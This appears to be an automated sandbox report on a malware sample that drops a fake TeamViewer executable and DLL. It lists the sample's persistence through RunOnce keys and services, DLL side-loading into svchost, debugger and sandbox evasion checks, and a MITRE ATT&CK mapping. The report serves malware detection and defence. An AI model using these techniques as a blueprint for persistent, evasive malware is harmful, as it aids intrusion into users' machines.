Source: C:\Users\user\Desktop\77Etc0bR2v.exeCode function: 1_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,1_2_00405E88

Persistence and Installation Behavior:

barindex
Creates processes via WMIShow sources
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeWMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeWMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeWMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\77Etc0bR2v.exeFile created: C:\Users\user\AppData\Roaming\TeamViewer\Teamviewer_Resource_ja.dllJump to dropped file
Source: C:\Users\user\Desktop\77Etc0bR2v.exeFile created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeJump to dropped file
Source: C:\Users\user\Desktop\77Etc0bR2v.exeFile created: C:\Users\user\AppData\Roaming\TeamViewer\TV.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F3344D0 GetPrivateProfileIntA,GetProcessHeap,HeapAlloc,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,WritePrivateProfileStringA,RtlZeroMemory,SHFileOperationA,GetProcessHeap,HeapFree,2_2_6F3344D0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_004E177C __EH_prolog3,GetModuleFileNameW,PathRemoveFileSpecW,_wcscat_s,_memset,GetPrivateProfileStringW,3_2_004E177C
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F3344D0 GetPrivateProfileIntA,GetProcessHeap,HeapAlloc,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,WritePrivateProfileStringA,RtlZeroMemory,SHFileOperationA,GetProcessHeap,HeapFree,3_2_6F3344D0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F3344D0 GetPrivateProfileIntA,GetProcessHeap,HeapAlloc,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,WritePrivateProfileStringA,RtlZeroMemory,SHFileOperationA,GetProcessHeap,HeapFree,6_2_6F3344D0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\USBManager\ParametersJump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F3337D0 QueryServiceConfigA,QueryServiceConfigA,GetProcessHeap,HeapAlloc,QueryServiceConfigA,ChangeServiceConfigA,GetProcessHeap,HeapFree,QueryServiceStatus,StartServiceA,2_2_6F3337D0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce TeamViewer.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce TeamViewer.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce TeamViewer.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce TeamViewer.exeJump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

barindex
Contains functionality to detect sleep reduction / modificationsShow sources
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_004FB7F93_2_004FB7F9
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_004DC9D63_2_004DC9D6
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_00500C6A3_2_00500C6A
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_004FFF683_2_004FFF68
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe TID: 5560Thread sleep count: 269 > 30Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe TID: 5560Thread sleep time: -134500s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5264Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5720Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F33B0A0 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree,2_2_6F33B0A0
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_004FFF683_2_004FFF68
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: __EH_prolog3,GetAdaptersInfo,_malloc,GetAdaptersInfo,3_2_004B9A29
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: GetAdaptersInfo,3_2_6F3382F0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exeCode function: 1_2_00405E61 FindFirstFileA,FindClose,1_2_00405E61
Source: C:\Users\user\Desktop\77Etc0bR2v.exeCode function: 1_2_0040263E FindFirstFileA,1_2_0040263E
Source: C:\Users\user\Desktop\77Etc0bR2v.exeCode function: 1_2_0040548B CloseHandle,DeleteFileA,lstrcat,lstrcat,lstrlen,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_0040548B
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F332DF0 wsprintfA,wsprintfA,RtlZeroMemory,FindFirstFileA,wsprintfA,DeleteFileA,MoveFileExA,FindNextFileA,FindClose,2_2_6F332DF0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F3328B0 RtlZeroMemory,RtlZeroMemory,wsprintfA,wsprintfA,wsprintfA,FindFirstFileA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcatA,DeleteFileA,FindNextFileA,FindClose,2_2_6F3328B0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_004BF3A9 __EH_prolog3,GetVolumeInformationW,FindFirstFileW,FindClose,FindFirstFileW,FindClose,GetVolumeInformationW,3_2_004BF3A9
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_0050331C __EH_prolog3_catch,FindFirstFileW,GetLastError,__CxxThrowException@8,FindClose,3_2_0050331C
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F332DF0 wsprintfA,wsprintfA,RtlZeroMemory,FindFirstFileA,wsprintfA,DeleteFileA,MoveFileExA,FindNextFileA,FindClose,3_2_6F332DF0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F3328B0 RtlZeroMemory,RtlZeroMemory,wsprintfA,wsprintfA,wsprintfA,FindFirstFileA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcatA,DeleteFileA,FindNextFileA,FindClose,3_2_6F3328B0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F332DF0 wsprintfA,wsprintfA,RtlZeroMemory,FindFirstFileA,wsprintfA,DeleteFileA,MoveFileExA,FindNextFileA,FindClose,6_2_6F332DF0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F3328B0 RtlZeroMemory,RtlZeroMemory,wsprintfA,wsprintfA,wsprintfA,FindFirstFileA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcatA,DeleteFileA,FindNextFileA,FindClose,6_2_6F3328B0
Source: svchost.exe, 00000014.00000002.749355403.00000282E9C72000.00000004.00000001.sdmpBinary or memory string: $@Hyper-V RAW
Source: TeamViewer.exe, 00000003.00000002.754192652.0000000005790000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000002.491168196.000001C4950E3000.00000004.00000001.sdmp, svchost.exe, 00000014.00000002.747809798.00000282E4429000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
Source: TeamViewer.exe, 00000003.00000003.412988843.0000000000B1C000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWSysWOW64\FirewallControlPanel.dll,-12122!3
Source: svchost.exe, 0000000E.00000002.490833749.000001C4950A9000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW

Anti Debugging:

barindex
Tries to detect sandboxes and other dynamic analysis tools (window names)Show sources
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeOpen window title or class name: ollydbg
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))Show sources
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeSystem information queried: CodeIntegrityInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeSystem information queried: CodeIntegrityInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeSystem information queried: CodeIntegrityInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeSystem information queried: CodeIntegrityInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeSystem information queried: CodeIntegrityInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeSystem information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_0053496B _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0053496B
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F33B0A0 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree,2_2_6F33B0A0
Source: C:\Users\user\Desktop\77Etc0bR2v.exeCode function: 1_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,1_2_00405E88
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F33B510 GetProcessHeap,HeapFree,HeapFree,HeapDestroy,2_2_6F33B510
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F33C1E2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_6F33C1E2
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_0051523A _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0051523A
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_0053496B _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0053496B
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_00534A9B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00534A9B
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F33C1E2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_6F33C1E2
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F33C1E2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_6F33C1E2

HIPS / PFW / Operating System Protection Evasion:

barindex
DLL side loading technique detectedShow sources
Source: C:\Windows\SysWOW64\svchost.exeSection loaded: C:\Users\user\AppData\Roaming\TeamViewer\TV.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F335130 LogonUserW,GetLastError,CloseHandle,2_2_6F335130
Source: C:\Users\user\Desktop\77Etc0bR2v.exeProcess created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe 'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' fJump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F333390 OpenProcessToken,GetTokenInformation,GetTokenInformation,GetLastError,GetProcessHeap,GetProcessHeap,HeapAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,ConvertSidToStringSidA,FreeSid,GetProcessHeap,HeapFree,CloseHandle,2_2_6F333390
Source: TeamViewer.exe, 00000003.00000002.753868992.0000000003DD0000.00000004.00000001.sdmpBinary or memory string: Program Manager
Source: TeamViewer.exe, 00000003.00000002.751436078.0000000000FA0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
Source: TeamViewer.exe, 00000003.00000002.751436078.0000000000FA0000.00000002.00020000.sdmpBinary or memory string: Progman
Source: TeamViewer.exe, 00000003.00000002.751436078.0000000000FA0000.00000002.00020000.sdmpBinary or memory string: &Program Manager
Source: TeamViewer.exe, 00000003.00000002.751436078.0000000000FA0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
Source: TeamViewer.exe, 00000010.00000000.471404886.0000000000733000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWndThumbnailClassDV2ControlHostBaseBarTeamViewer_TitleBarWindowProgmanTVWidgetWin#32771teamviewerdebug.exeteamviewer.exeQuick Connect ButtonStartmenuTaskbarDesktopsidebar.exe\VarFileInfo\Translation\StringFileInfo\%04x%04x\FileDescription.exeOther applicationsSideBar_HTMLHostWindowSideBar_AppBarBulletBasicWindowTVWhiteboardOverlayWindowButtonEnableApplicationSelection: %1% (..\Server\WindowOberserver.cpp, 720)SelectAllWindows: %1%;%2% (..\Server\WindowOberserver.cpp, 751)SetSingleWindow (..\Server\WindowOberserver.cpp, 820)SessionEnded: %1% (..\Server\WindowOberserver.cpp, 827)SessionStart: %1%; type: %2% (..\Server\WindowOberserver.cpp, 910)HandleDesktopChanged: %1% (..\Server\WindowOberserver.cpp, 1017)Winlogonmap/set<T> too long
Source: TeamViewer.exe, 00000003.00000002.753868992.0000000003DD0000.00000004.00000001.sdmpBinary or memory string: user841675usProgram ManagerC:\Windows\explorer.exe3910722678072
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageA,KillTimer,RtlZeroMemory,wsprintfW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,SetEvent,SetTimer,DispatchMessageA,GetMessageA,KillTimer,VirtualFree,2_2_6F336D50
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: GetLocaleInfoA,_xtoa_s@20,3_2_0054113A
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: GetLocaleInfoA,3_2_0054E79D
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: _LcidFromHexString,GetLocaleInfoA,3_2_0054E87F
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,3_2_0054E915
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: GetLocaleInfoA,3_2_0054D9D0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: _LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,3_2_0054E987
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: _LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,3_2_0054EB57
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,3_2_0054EC7B
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,3_2_0054EC16
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: _TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,3_2_0054ECB7
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageA,KillTimer,RtlZeroMemory,wsprintfW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,SetEvent,SetTimer,DispatchMessageA,GetMessageA,KillTimer,VirtualFree,3_2_6F336D50
Source: C:\Windows\SysWOW64\svchost.exeCode function: RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageA,KillTimer,RtlZeroMemory,wsprintfW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,SetEvent,SetTimer,DispatchMessageA,GetMessageA,KillTimer,VirtualFree,6_2_6F336D50
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_0054B459 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,2_2_0054B459
Source: C:\Users\user\Desktop\77Etc0bR2v.exeCode function: 1_2_00405B88 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDList,762AA680,lstrcat,lstrlen,1_2_00405B88
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F338510 DisableThreadLibraryCalls,GetModuleHandleA,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetSystemDirectoryA,ExitProcess,PathAddBackslashA,PathAddBackslashA,GetProcessHeap,HeapAlloc,GetModuleFileNameA,GetProcessHeap,HeapAlloc,RtlMoveMemory,PathRemoveFileSpecA,PathAddBackslashA,SetCurrentDirectoryA,SHGetSpecialFolderPathA,PathAddBackslashA,wsprintfA,GetFileAttributesA,GetFileAttributesA,ExitProcess,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,ExitProcess,GetProcessHeap,HeapAlloc,GetModuleFileNameA,PathFindFileNameA,RtlZeroMemory,RtlGetVersion,WTSGetActiveConsoleSessionId,GetProcessHeap,HeapAlloc,GetUserNameW,GetProcessHeap,HeapAlloc,GetComputerNameExW,GetProcessHeap,HeapAlloc,wsprintfA,lstrlenA,GetCommandLineA,CharLowerA,StrToIntA,LocalFree,RtlZeroMemory,GetPrivateProfileIntA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,wsprintfA,GetProcessHeap,HeapFree,LoadLibraryA,ExitProcess,RtlZeroMemory,NtQuerySystemInformation,wsprintfA,wsprintfA,LoadLibraryA,FindWindowW,FindWindowW,wsprintfA,LoadLibraryA,wsprintfA,LoadLibraryA,wsprintfA,LoadLibraryA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LoadLibraryA,wsprintfA,LoadLibraryA,ExitProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,LocalFree,CloseHandle,CloseHandle,NtTerminateThread,CloseHandle,2_2_6F338510
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_00511D6F __EH_prolog3_catch,_memset,_memset,socket,WSAGetLastError,htonl,inet_addr,htons,WSAGetLastError,bind,bind,WSAGetLastError,Sleep,bind,listen,WSAGetLastError,select,WSAGetLastError,getsockname,WSAGetLastError,Sleep,__WSAFDIsSet,accept,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,WSAGetLastError,Sleep,GetTickCount,__WSAFDIsSet,WSAGetLastError,_strncmp,_strncmp,_strncpy,shutdown,Sleep,listen,Sleep,listen,WSAGetLastError,accept,Sleep,_memset,WSAGetLastError,_memset,select,_strncmp,3_2_00511D6F

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts2Windows Management Instrumentation11DLL Side-Loading1DLL Side-Loading1Deobfuscate/Decode Files or Information1OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
Default AccountsNative API1DLL Search Order Hijacking2DLL Search Order Hijacking2Obfuscated Files or Information2LSASS MemoryAccount Discovery1Remote Desktop ProtocolScreen Capture1Exfiltration Over BluetoothEncrypted Channel21Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsService Execution12Create Account1Valid Accounts2Software Packing1Security Account ManagerFile and Directory Discovery3SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Valid Accounts2Access Token Manipulation21DLL Side-Loading1NTDSSystem Information Discovery36Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol14SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronWindows Service22Windows Service22DLL Search Order Hijacking2LSA SecretsQuery Registry1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRegistry Run Keys / Startup Folder1Process Injection12Masquerading12Cached Domain CredentialsSecurity Software Discovery451VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsRegistry Run Keys / Startup Folder1Valid Accounts2DCSyncVirtualization/Sandbox Evasion22Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobVirtualization/Sandbox Evasion22Proc FilesystemProcess Discovery2Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Access Token Manipulation21/etc/passwd and /etc/shadowSystem Owner/User Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
